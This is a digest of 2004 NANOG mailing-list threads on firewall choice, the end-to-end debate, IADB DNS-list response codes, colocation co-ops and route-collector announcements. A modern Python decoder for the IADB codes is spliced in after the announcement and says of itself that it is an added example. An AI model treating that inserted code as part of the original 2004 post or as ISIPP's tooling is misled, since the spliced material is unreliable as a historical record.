Re: Long-term identifiers (was Re: who offers cheap (personal) 1U colo?)
Sean,

SD> ... A long-term end-to-end SD identifier would let me immediately drop the specific
SD> infected computer's SD traffic regardless of its rotating IP addresses, even if your abuse

What is to prevent rapid changes to the identifier, even more easily than rapidly changing IP addresses? In other words, why trust the identifier? Or at least, how would this identifier really be long term?

d/
--
Dave Crocker
dcrocker-at-brandenburg-dot-com
Brandenburg InternetWorking
www.brandenburg.com
Sunnyvale, CA USA
tel:+1.408.246.8253
Update on Querying IADB
For those interested in seeing how this has evolved, and what exactly this particular accreditation database provides, our query pages have been expanded, and include a link to the full suggested DNSL data response codes. The codes we use at present include:

127.0.0.1       Listed in IADB
127.0.1.255     Vouched listing
127.2.255.1     Publishes SPF record
127.2.255.2     Publishes Microsoft Caller I.D. for Email record
127.2.255.101   Participates in Habeas program
127.2.255.102   Participates in Ironport's Bonded Sender program
127.3.100.0     Has absolutely no mailing controls in place
127.3.100.1     Scrapes addresses, pure opt-out only
127.3.100.2     Accepts unverified sign-ups such as through web page
127.3.100.3     Accepts unverified sign-ups, gives chance to opt out
127.3.100.4     Reserved
127.3.100.5     Has opt-in confirmation mechanism
127.3.100.6     Has and uses opt-in confirmation mechanism
127.3.100.7     Reserved
127.3.100.8     Reserved
127.3.100.9     Reserved
127.3.100.10    All mailing list mail is confirmed opt-in

The general information is at http://www.isipp.com/iadb.php
Query information specifically is at http://www.isipp.com/iadbquery.php

It is, of course, free to query IADB, as well as to be listed as an individual.

Anne
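As an added example (not part of the announcement, nor ISIPP's own tooling): a small Python decoder for the response codes listed above, with the usual DNSBL reversed-octet query name. The zone name `iadb.example` is an assumed placeholder, since the post does not give it, and the lookup answers are constructed inline so nothing is queried.

```python
"""Decode IADB-style DNS list response codes into sender attributes.

Added example, not the announcement's or ISIPP's own code. The zone name
is an assumed placeholder; the code table is the one given in the post.
No network access is needed: the lookup answers are constructed inline.
"""
import ipaddress
from typing import Dict, Iterable, List, Set

IADB_ZONE = "iadb.example"  # ASSUMPTION: the post does not name the zone

# Codes as listed in the announcement, keyed by the returned A record.
# Reserved codes (127.3.100.4, .7, .8, .9) are deliberately absent so that
# they fall through to 'unknown' instead of being treated as meaningful.
IADB_CODES: Dict[str, str] = {
    "127.0.0.1": "listed",
    "127.0.1.255": "vouched",
    "127.2.255.1": "publishes_spf",
    "127.2.255.2": "publishes_caller_id",
    "127.2.255.101": "habeas",
    "127.2.255.102": "bonded_sender",
    "127.3.100.0": "no_controls",
    "127.3.100.1": "scrapes_opt_out_only",
    "127.3.100.2": "unverified_signups",
    "127.3.100.3": "unverified_signups_with_opt_out",
    "127.3.100.5": "has_confirmation",
    "127.3.100.6": "has_and_uses_confirmation",
    "127.3.100.10": "all_lists_confirmed_opt_in",
}
DNSBL_RANGE = ipaddress.IPv4Network("127.0.0.0/8")


def query_name(sender_ip: str, zone: str = IADB_ZONE) -> str:
    """Build the lookup name: sender octets reversed, then the list zone.

    IPv4Address() rejects malformed input, so a mistyped or hostile
    'address' never becomes part of a DNS query.
    """
    octets = str(ipaddress.IPv4Address(sender_ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def decode(answers: Iterable[str]) -> dict:
    """Map the A records of one lookup onto named attributes.

    Reserved, unknown and out-of-range codes are collected under
    'unknown' rather than ignored, so a code the client does not
    understand can never be mistaken for a favourable one.
    """
    listed = False
    flags: Set[str] = set()      # 127.0.1.x / 127.2.x vouching and auth codes
    controls: Set[str] = set()   # 127.3.100.x mailing-control codes
    unknown: List[str] = []
    for answer in answers:
        try:
            addr = ipaddress.IPv4Address(answer)
        except ValueError:
            unknown.append(answer)
            continue
        tag = IADB_CODES.get(answer)
        if addr not in DNSBL_RANGE or tag is None:
            unknown.append(answer)
        elif tag == "listed":
            listed = True
        elif answer.startswith("127.3.100."):
            controls.add(tag)
        else:
            flags.add(tag)
    return {"listed": listed, "flags": flags,
            "controls": controls, "unknown": unknown}


def accept_as_confirmed_opt_in(answers: Iterable[str]) -> bool:
    """Example local policy: only a listed sender whose every list is
    confirmed opt-in qualifies, and any code we cannot decode vetoes it."""
    d = decode(answers)
    return (d["listed"]
            and "all_lists_confirmed_opt_in" in d["controls"]
            and not d["unknown"])


if __name__ == "__main__":
    # Constructed sample: what a lookup for 192.0.2.10 (RFC 5737 test
    # space) might return for a listed, SPF-publishing, opt-in sender.
    sample = ["127.0.0.1", "127.2.255.1", "127.3.100.10"]
    print(query_name("192.0.2.10"))
    print(decode(sample))
    print(accept_as_confirmed_opt_in(sample))
```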
Re: Asymmetric Routing / Stateful Inspection Firewall
On Tue, 2004-03-16 at 21:27, Mike Turner wrote:
> I am currently looking for a stateful inspection firewall that supports asymmetric routing. Is there such a product?

Sounds like you are looking for an SI firewall that supports full load balancing, not just high availability. FW-1 does this, there may be others as well. Keep in mind that you can run into connectivity issues if you have big pipe connections. You end up in a situation where outbound packets can cross one firewall and replies can hit the other before the state info has had time to sync. Beyond that, it should fit your need.

Chris
ANNOUNCEMENT: RIPE NCC's Second Remote Route Collector in North America Deployed at the NYIIX (RRC11)
Dear All,

The RIPE NCC is pleased to announce that the Routing Information Service's (RIS) second Remote Route Collector in North America, RRC11, is now ready to peer with members at the New York International Internet Exchange (NYIIX). The collector is our first outside of the RIPE region to accept IPv6 peering sessions.

The RIS is also present at MAE-West in San Jose and we are currently looking for more peers there too. Please see the following URLs for peering details:

- http://www.ripe.net/ris/rrc11.html
- http://www.ripe.net/ris/rrc08.html

Your BGP feeds are warmly welcome :)

+++ Other RIS Developments:

* New web interface for RISwhois - RIPE NCC IPv4/IPv6 address to origin mapping
  The service looks up IPv4 or IPv6 addresses in the RIB dumps most recently collected by the RIS, and reports the prefixes and origin AS numbers which match the specified IP, as well as the RRCs that observed the prefixes.
  URL: http://www.ris.ripe.net/cgi-bin/riswhois.cgi

* RIS 'MOAS' Report
  List of prefixes being advertised by Multiple Origin Autonomous Systems.
  URL: http://www.ris.ripe.net/moas/moas.html

* Documentation on how to set up the RISng database and the associated tools
  An in-depth overview of the RIS database structure written by two students at the Technical University of Munich.
  URL: http://www.ripe.net/ris/analysis.html

* Libbgpdump 1.4 is now available on the RIS web site
  Libbgpdump is a C library for reading Zebra/Quagga dump files with IPv4 and IPv6 support. The software package also includes 'bgpdump', a drop-in replacement for route_btoa with IPv6 support and better handling of corrupt data.
  URL: http://www.ris.ripe.net/source/

+++

For more info about the RIS: http://www.ripe.net/ris.
Feel free to drop us a line at [EMAIL PROTECTED]

Best regards,
The RIS Team
---
Matthew Williams (MW243-RIPE)
Customer Liaison Engineer
RIPE NCC - http://www.ripe.net/np/
Re: Update on Querying IADB
thanks. but I use 127.0.0.0/8 for other stuff. Hope you don't mind.

> For those interested in seeing how this has evolved, and what exactly this particular accreditation database provides, our query pages have been expanded, and include a link to the full suggested DNSL data response codes. The codes we use at present include:
>
> 127.0.0.1      Listed in IADB
> 127.0.1.255    Vouched listing
> ... list elided.

--bill
Re: Firewall opinions wanted please
Netscreen rocks. They are record-breakingly sexy devices running the gamut as far as networks they can be configured to service, and the burlier beasties are easily worthy of deployment on a carrier class network.

However, if you're looking to drop small change on a product that will not be required to withstand the rigors of VPN termination, HA, VRRP, blah blah blah, and you are trying to cover basic, fundamental firewalling (port filtering is a very base feature and should open the doors to many other vendors if that's truly the brunt of what you are trying to achieve), then take a gander at PIX. Or even Raptor or Checkpoint. All 3 are old standbys that have seen their days being equally celebrated as leaders and mourned as losers.

boa sorte,
--ra

--
k. rachael treu, CISSP
[EMAIL PROTECTED]
..quis custodiet ipsos custodes?..

On Tue, Mar 16, 2004 at 02:27:16PM -0800, Nicole said something to the effect of:
> Hi
> I am looking for a good but reasonably priced firewall for a 40 or so server site. Some people swear by Pix, others swear at it a lot. Also I have heard good things about Netscreen. Or any others you would recommend for protecting servers on a busy network. Don't really need anything with VPN, just the standard http, ftp, ssh, https type traffic up to 100mb throughput. From what I have heard a proxy firewall would be best?
> Thanks in advance!!
> Nicole
> --
> [EMAIL PROTECTED] - Powered by FreeBSD
> -- Daemons will now be known as spiritual guides -Politically Correct UNIX Page
Re: Firewall opinions wanted please
On Tue, Mar 16, 2004 at 05:01:22PM -0600, Gregory Taylor said something to the effect of:
> ..snip snip..
> As discussed in a previous thread, I spoke about transparent bridging used for packet filtering and mangling. On a small application, that might be a good idea, because you get all of the true internet access (i.e. legit IPs, no proxying etc.) with the same ability to filter TCP, ICMP, UDP, IGMP etc. traffic. Disadvantages to dealing with transparent bridging are that you run into the whole MAC address collision and excess over-head announcements being made from the bridge itself every time it sends a packet through.
>
> The best option I guess is to figure out how important it is for you to have a firewall,

_Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)

Curses. Budget constraints. Bah.

> what is the reason you need one and how important the data is on your servers. That will help you decide the best choice for a firewall or proxy application.

See above. ;) The importance of the data is often more an issue of calculating things like redundancy and storage. A firewall in this case should likely be regarded as non-negotiable. Be careful with transparent bridging in lieu of stricter edge filtering... Also consider the efficacy and reward of firewall logs, application layer filtering, and IDS integration (in a budget-friendly, open source flavor of free...) down the road.

ymmv,
--ra

--
k. rachael treu, CISSP
[EMAIL PROTECTED]
..quis custodiet ipsos custodes?..

> Greg
>
> -- Original Message --
> From: Nicole [EMAIL PROTECTED]
> Date: Tue, 16 Mar 2004 14:27:16 -0800 (PST)
>
>> Hi
>> I am looking for a good but reasonably priced firewall for a 40 or so server site. Some people swear by Pix, others swear at it a lot. Also I have heard good things about Netscreen. Or any others you would recommend for protecting servers on a busy network. Don't really need anything with VPN, just the standard http, ftp, ssh, https type traffic up to 100mb throughput. From what I have heard a proxy firewall would be best?
>> Thanks in advance!!
>> Nicole
>> --
>> [EMAIL PROTECTED] - Powered by FreeBSD
>> -- Daemons will now be known as spiritual guides -Politically Correct UNIX Page
Re: Firewall opinions wanted please
>> The best option I guess is to figure out how important it is for you to have a firewall,
>
> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)

Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net?

Two questions asked, Two answers are sufficient.

--bill
Re: Update on Querying IADB
On Wed, 17 Mar 2004 01:48:45 PST, Anne P. Mitchell, Esq. [EMAIL PROTECTED] said:
> 127.3.100.3    Accepts unverified sign-ups, gives chance to opt out
> 127.3.100.5    Has opt-in confirmation mechanism
> 127.3.100.6    Has and uses opt-in confirmation mechanism
> 127.3.100.10   All mailing list mail is confirmed opt-in

Hmm.. this is loads of fun if you're running a Listserv that has several thousand lists defined, and not all of them have the same policies (for instance, although the vast majority of our lists are 'confirmed opt-in', we have several lists that are bulk-loaded with database extracts for captive audience lists such as all freshmen, all grad students, and so on).

Also, the pricing seems a bit whacked - are you *really* expecting sites that have less than 30 customers to pay $200/month? I know a *lot* of people who have formed collectives of 10-15 people who chip in and get a 1U at a colo

It's totally unclear how you can encode an individual listing - that whole stuff to the left of the @ sign thing is rather unhandy...

I'll skip the estimates of the cash flow generated if the database gets big enough to be useful, but I suspect that Verisign might have competition
Re: Update on Querying IADB
> Also, the pricing seems a bit whacked - are you *really* expecting sites that have less than 30 customers to pay $200/month? I know a *lot* of people who have formed collectives of 10-15 people who chip in and get a 1U at a colo

They are not email service providers; if you are talking about a site which only publishes non-commercial mailing lists, they would probably fall under the newsletter publisher rate, which is $10.00/month.

Anne
[Fwd: Re: who offers cheap (personal) 1U colo?]
Stephen J. Wilcox wrote:
> if the market for this is nanog and you're just looking for smtp/shell surely we can manage this between ourselves without charge (ask your nanog buddy for a shell as a favour).. I know I can and will do this

Well, I do have motives beyond outbound smtp. I actually looked at some of the mail only services, but I really want someplace that will do IMAP and authenticated SMTP. I want to be able to configure how I filter spam, which I don't want to do at the MUA level because I'll need to access mail various ways from various locations.

Besides mail, I want to be able to create and control firewall rules on the box. I also want to be able to set up Apache exactly like I want it, etc. And sometimes it's nice to have shell access on a machine in a different location for troubleshooting purposes.

However, I do like the idea of setting up a community of like minded individuals who would be willing to do secondary MX and/or DNS for each other, and perhaps provide basic shell accounts... On the other hand, I'm a little leery of giving someone I don't know access to one of my boxes.

I'm curious how a virtual colocation or dedicated server co-op could work, with values statements on how servers must be run (secure, no SPAM), etc. Would there be member fees? Would members have to democratically vote to let new members in after some kind of vetting process? Would anyone even be interested in such an idea?

It would also be interesting to see what kind of monitoring tools could be developed with a diverse set of servers in different parts of the world... could we set up a co-op version of keynote monitoring, where we helped monitor each other?
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of:
>>> The best option I guess is to figure out how important it is for you to have a firewall,
>>
>> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)
>
> Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net?
>
> Two questions asked, Two answers are sufficient.

Nope. One will do it.

The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such an exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary.

The Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and interceptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is power outage if it occurs.

Before this turns to a "you security freaks want to screw around with my network and don't care about availability"... Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity?

Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself.

As for your assertion that firewalls reduce the overall security of the 'net, can you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior as a close second to the ignorant and infected.

--ra

--
k. rachael treu, CISSP
[EMAIL PROTECTED]
..quis custodiet ipsos custodes?..

> --bill
Re: Firewall opinions wanted please
> _Everyone_ (network connected) should have a firewall.

Every network-connected device should have a security layer. Firewalls provide a nice modular security layer and they are cheap compared to the devices/networks that they protect.

> When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net?

The security issue has always been there. You can either build security into the network or into the endpoints. Given that the Internet model is to keep complexity out of the network and in the endpoints, the next question is for site administrators to ask themselves, do I manage *MY* network, like the Internet, or do I manage it like an endpoint? If the answer is to treat it as an endpoint, then it is quite appropriate to install a firewall as a gateway between the network and the Internet.

Consider that many endpoints in today's world now encapsulate networks within a single physical device. Routers, switches, cellphones, cars and any embedded device using I2C. Just as the distinction between a router and a switch has been blurred by the advance of technology, so too has the distinction between an endpoint and a network.

--Michael Dillon
Re: Firewall opinions wanted please
> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)

By firewall, do you mean a dedicated unit that does stateful filtering or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs... I'm sure that the cost of the ACLs (i.e. $0.00) versus the cost of a firewall also helped them in their decision...

Eric :)
House Panel Slams Federal IT Security
Hi,

Federal agencies aren't doing enough to secure their network systems, even as documented cyber-attacks against the U.S. government continue to dramatically rise, U.S. Rep. Adam Putnam (R-FL) said Thursday.

For more info check http://www.internetnews.com/infra/article.php/3327081

Thanks,
-J
Re: Update on Querying IADB
> The codes we use at present include:
> 127.0.0.1      Listed in IADB

Hmmm... listed in my /etc/hosts as well. Am I IADB compliant?

It's interesting to see how everyone tries to reinvent LDAP on top of DNS and/or BGP instead of just using the LDAP protocol itself. Somehow the world has gotten the idea that LDAP is an addressbook protocol when, in fact, it is a fairly generic distributed hierarchical database access protocol.

IMHO there are two right ways to publish these types of databases. One is to use LDAP and the other is to use an XML protocol like XML-RPC or SOAP. Overloading DNS as a generic database query protocol is just a plain bad idea. At least both LDAP and XML support the concept of a schema which defines the data being transmitted in an unambiguous way and ensures that it can be correctly parsed and decoded.

--Michael Dillon
Re: Firewall opinions wanted please
> Date: Wed, 17 Mar 2004 11:57:33 -0600
> From: Rachael Treu [EMAIL PROTECTED]
> Sender: [EMAIL PROTECTED]
>
> On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of:
>>>> The best option I guess is to figure out how important it is for you to have a firewall,
>>>
>>> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)
>>
>> Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net?
>>
>> Two questions asked, Two answers are sufficient.
>
> Nope. One will do it.
>
> The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such an exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary.
>
> The Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and interceptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is power outage if it occurs.
>
> Before this turns to a "you security freaks want to screw around with my network and don't care about availability"... Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity?
>
> Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself.
>
> As for your assertion that firewalls reduce the overall security of the 'net, can you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior as a close second to the ignorant and infected.

I dislike firewalls for many applications, although I have a Sonic Wall on my cable modem. On the whole, they lead to false belief that firewalls really make you safe. They also block many interesting applications. Things like H.323 conferencing are made vastly more complex by firewalls with no easy or canned work-arounds.

One large research site I work closely with has directly opted for IDS with a bad attitude (love that description) which has successfully blocked many intrusion and DOS attempts with no major failures. Slammer did overwhelm it, but it did the same for most everything.

The end-to-end nature of the net is really, really important, but is being blocked more and more by those who think the net is web browsing and e-mail clients and that everything else is simply an annoyance. This attitude is hamstringing network development already and may end up turning the commercial Internet into a permanently limited tool with fewer real capabilities than the ARPANET had before TCP/IP replaced NCP.

Grandma may need a firewall. (My sister DEFINITELY needs one.) But not all network connections need or will benefit from a firewall. And many systems will exist with significant security flaws because the owners believe that the firewall takes care of everything.

--
R. Kevin Oberman, Network Engineer
Energy Sciences Network (ESnet)
Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
E-mail: [EMAIL PROTECTED]
Phone: +1 510 486-8634
Re: who offers cheap (personal) 1U colo?
On Wed, 17 Mar 2004, Janet Sullivan wrote:
> How would this vetting process work? I'm willing to give other nanog folks shell accounts on my machine in return for same, but I really don't want to hand out accounts to packet kiddies.

Restrict it to people you've met or spoken to enough to think you know them..

Steve
Re: who offers cheap (personal) 1U colo?
Hello Janet/List -

First, allow me to introduce myself, my name is Jonathan M. Slivko and I work for InvisibleHand Networks, Inc. (http://www.invisiblehand.net). Currently, we offer colocation and bandwidth services in the New York/New Jersey market (Telehouse and Equinix to be precise).

The reason for this post is to put forth a suggestion: InvisibleHand Networks, Inc. allows you to buy bandwidth on demand as needed without having to commit to any bandwidth level, 95th percentile or long term contract. We can colocate personal 1U servers at either facility for a set price per server and then you can purchase bandwidth on our spot market. All of our services are on month-to-month contracts and we can offer you some kind of discount if you buy in bulk. However, without having a valid consensus as to how many people would be interested in such a deal, I cannot/will not offer pricing on this list (contact me offlist if interested).

I look forward to talking to you soon.

Janet Sullivan wrote:
>> I have been aching for this now for about six years. In every professional setting I've ever been in, a need for this kind of thing arises and my advice to my employer/client is always the same: pay the $x per month for a colo server for your network/system engineers to use as an outpost for emergencies, external analysis, and monitoring.
>
> Exactly! While route servers are great, sometimes I need the flexibility of an outside shell account to do troubleshooting. I know a few other people at work who also keep outside shell accounts somewhere for this very purpose.
>
>> It seems like approaching one of the larger colo providers and coordinating some sort of NANOG Discount might be one quick route.
>
> I'm of two minds on this. Obviously, if a group of us go to provider X and say we want Z amount of rack space, we can probably get a good deal.
>
> On the other hand, I'm also interested in a community of like minded folks with servers located in diverse environments who would trade access with one another. If we're all in one rack in one datacenter, there is more of a chance we'll all go down together. If we have a diverse footprint, that is much less likely to happen.
>
>> The discount could be restricted to those who are appropriately vetted. This program would be of value to the colo provider because of the potential for discount recipients to direct business their way.
>
> How would this vetting process work? I'm willing to give other nanog folks shell accounts on my machine in return for same, but I really don't want to hand out accounts to packet kiddies.
>
>> Suffice it to say, I'm interested, both to address current work-day issues and for personal use.
>
> I'm also interested. I do currently have a dedicated FreeBSD server in Australia for personal use. Those of us who are running our own personal mail DNS servers could get together to back each other up.

--
Jonathan M. Slivko [EMAIL PROTECTED]
Sales/Network Operations
Invisible Hand Networks, Inc. http://www.invisiblehand.net
670 Broadway, 2nd Floor, New York, NY 10012
Ph: 212-226-1422 F: 212-202-7640 M: 646-924-9211
RE: Firewall opinions wanted please
Depending on your chosen vendor the ACL cost is unlikely to be $0 - if you steal CPU cycles from packet forwarding then you incur earlier router upgrade costs and that has a NPV cost increase associated with it. It's just not as obvious as an invoice for a firewall.

Matt.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Eric Gauthier
Sent: 17 March 2004 17:20
To: [EMAIL PROTECTED]
Subject: Re: Firewall opinions wanted please

>> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)
>
> By firewall, do you mean a dedicated unit that does stateful filtering or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs... I'm sure that the cost of the ACLs (i.e. $0.00) versus the cost of a firewall also helped them in their decision...
>
> Eric :)
Re: who offers cheap (personal) 1U colo?
Mike Damm wrote:
> That being said, I've had the idea for a couple years now of getting enough geeky folks together to rent a rack on both coasts and populate it with a few different operating systems and bits of gear for just the reasons outlined in this thread. So if you decide to put something together, I'm up for it.

I got an email from Eric Brunner-Williams who hangs out on freebsd-isp and nanog that really sparked my interest. Go to http://wampumpeag.net/vixie-personal-1U-colo.html

At the bottom of the page it reads:

> We've started the paperwork with the NCBA to form a real honest-to-goodness member-owned cooperative for bloggers, and a real honest-to-goodness member-owned cooperative for personal 1U colo is just a second set of paper. This is about as vague as a price sheet can get, but this was where we were headed before Paul popped the question on NANOG, and in April we'll be accepting member 1U units.
Re: Firewall opinions wanted please
Not _firewalling_, but access limitation. Grandma can live with a PNAT router - she does not need any firewall, if she does not grant external access to anything. She can live with Windows' _default deny_ setting. If grandma has extra money, it is better to purchase anti-virus.

Moreover. Just for _grandma_, it can be cheaper to do nothing than to invest into security (bad thing for us, I know!) - because she loses '$0' in case of intrusion... It explains the wide spread of modern viruses, spam-trojans etc (they cost '$0' to infected households in many cases).

It is as with wireless access - my friend has a secured access point, but when I tried, I could use the unsecured access points of 2 of his neighbours. They know about the insecurity - but they do not lose anything, so they do not want to spend $0.01 to improve it. And unfortunately, I can not blame them.

> On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of:
>>>> The best option I guess is to figure out how important it is for you to have a firewall,
>>>
>>> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)
>>
>> Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net?
>>
>> Two questions asked, Two answers are sufficient.
>
> Nope. One will do it.
>
> The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such an exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary.
>
> The Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and interceptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is power outage if it occurs.
>
> Before this turns to a "you security freaks want to screw around with my network and don't care about availability"... Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity?
>
> Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself.
>
> As for your assertion that firewalls reduce the overall security of the 'net, can you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior as a close second to the ignorant and infected.
>
> --ra
>
> --
> k. rachael treu, CISSP
> [EMAIL PROTECTED]
> ..quis custodiet ipsos custodes?..
>
>> --bill
NetAdmin + sales on NANOG like places.
On Wed, 17 Mar 2004, Jonathan M. Slivko wrote:
> SNIP INTRO SALES BLURB
> I look forward to talking to you soon.
>
> Jonathan M. Slivko [EMAIL PROTECTED]
> Sales/Network Operations
> Invisible Hand Networks, Inc.

I am currently doing a little of both sales/network admin at my company which competes directly with Jonathan's in the NYC market. I have some ?s about (network admins + sales people) for nanog folk:

- As much as I sympathize with JS's desire to get his company name and information out, is this kind of E-mail encouraged/discouraged on NANOG? (AUP: Blatant product marketing is unacceptable. Does this fit?)

- Are more of the current network/system admins being asked to leverage otherwise non-business relationships (like NANOG) to increase sales? My initial reaction to his E-mail was sympathy for the effort, but I'm curious if other netadmins are being handed a sales hat. I don't mean the people who switched to the sales team totally.

- Do you still maintain your network equipment and now have the responsibility to bring in new business for your company? (This assumes the company is/was large enough to not need you to do both.)

- Where do we draw the line on NANOG discussions about steering a conversation that hits close enough to your business to allow this?

I know from some of my previous posts there are a lot of marketing/sales types subscribed to NANOG that can/will/ and do jump at an opportunity to sell their product. I also know that sometimes we ask for that ourselves like Paul's question about 1U that he is summarizing off list so there is a place for these people to participate. Will there soon be a place for North American Sales And Network Operators Group NASA-NOG mailing list more focused on putting the techs in touch with the sales guys? Would NANOG as a group agree (I know...you can laugh now.) that requests made here for suggestions are more often looking for technical people that have purchased from a company than a slightly biased sales pitch from the company you work for?

I'm not an anti-capitalist, but I do like to attempt to keep the SNR down and if companies force sales hats to the networking staff this will become much more prevalent.

Jonathan this isn't intended to offend you either, so I hope you don't take it that way. SpamAssassin in place and filters setup so I can handle the replies for anyone who wants to respond off the list.

Gerald Coon
Network Administrator (Who also wears a sales hat at times for the same company)
Internet Channel
New route-views collector up at the LINX
Folks,

We are now up and running at the LINX (London Internet Exchange) and would like to invite folks at the LINX to peer with route-views. You can get to the open CLI via 'telnet route-views.linx.routeviews.org' (of course, nothing much there yet). Please contact us at [EMAIL PROTECTED] if you would like to contribute your view. In addition, I've included our standard boilerplate below.

Thanks,
The Route-Views Team

- AS: 6447 University of Oregon
    route-views:      128.223.60.103 (multi-hop IPv4)
    route-views2:     128.223.60.102 (multi-hop IPv4)
    route-views3:     128.223.60.108 (multi-hop IPv4)
                      2001:468:d01:3c::80df:3c6c (multi-hop IPv6)
    route-views6:     128.223.60.194 (v6 peering only)
                      2001:468:d01:3c::80df:3c6d (multi-hop IPv6)
    route-views.wide: 202.249.2.166 (WIDE peering only)
    route-views.paix: 198.32.176.5 (PAIX peering only)
    route-views.linx: 195.66.225.222 (LINX peering only)
    route-views.linx: 195.66.227.222 (LINX peering only)
- Route-views does not announce _any_ prefixes.
- We would like to receive a full default-free table from all sessions with all peers.
- In order for our multihop-ebgp sessions to survive transient network failures, we would like to increase the BGP hold-timer to 10 minutes (600 seconds). A value of zero does not work for several cases. If possible, peers should set their hold-timer to the max value, which allows Route-Views to change without your intervention.
    cisco:   neighbor 128.223.60.x timers 21845 65535
    juniper: set protocols bgp group routeviews hold-time 65535
- Please send your communities. If possible, please describe the communities you advertise.
- Please provide your NOC's email and telephone number(s).
- Route information from these sessions is made publicly available in two forms: manufacturer-style "show ip bgp" and MRT format.

-- Short questionnaire. These data will only be shared with researchers.
- What type of router(s) are we peering with?
- We have a (closed) mail list which we use to announce outages to our peers. If you would like your noc added to this list, please let us know.

Thanks!
Cisco switch CPU overload
I've a core switch (cisco 5505) with 10+ VLANs configured on it and a cisco 7204 directly connected to it. The 7204 then connects to my upstream and we run BGP. We announce two different /21 blocks and were fine until last week. We got a new /20 IP block and advertised it (added to the 7204 config). Everything is working fine, but since then we see CPU overload from time to time on the 5505.

The following further explains the physical connection:

                |------|       |------|
    Internal ---| 5505 |-------| 7204 |--- Upstream
                |------|       |------|

We have RIP (ver 2) running on the 5505 but not on the 7204. (Those two are not talking any routing protocols to each other.) I can't figure out the reason but want to urgently get this resolved. You may contact me off list too for any further info necessary.

Thanks in advance,
Priyantha Pushpa Kumara
Wightman Internet Ltd.
Re: Firewall opinions wanted please
Rachael Treu wrote:
> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)

No, the applications should accept only authorized connections. If that were the case, there would be no need to filter at packet level.

Pete
Re: Firewall opinions wanted please
Guys...firewall is as generic a term as any. Saying grandma needs a router does not mean that an M20 is interchangeable with her Linksys.

The definition of firewall[1]:

1. A fireproof wall used as a barrier to prevent the spread of fire.
2. Computer Science. Any of a number of security schemes that prevent unauthorized users from gaining access to a computer network or that monitor transfers of information to and from the network.

By that rationale, firewall includes ACLs, filtering, and the umpteen built-in apps that ship standard with home CPE/routers that _call themselves_ firewall software. I am absolutely talking access control. Not about an HA Netscreen500 pair with VRRP off redundant switch fabric and H.323 support.

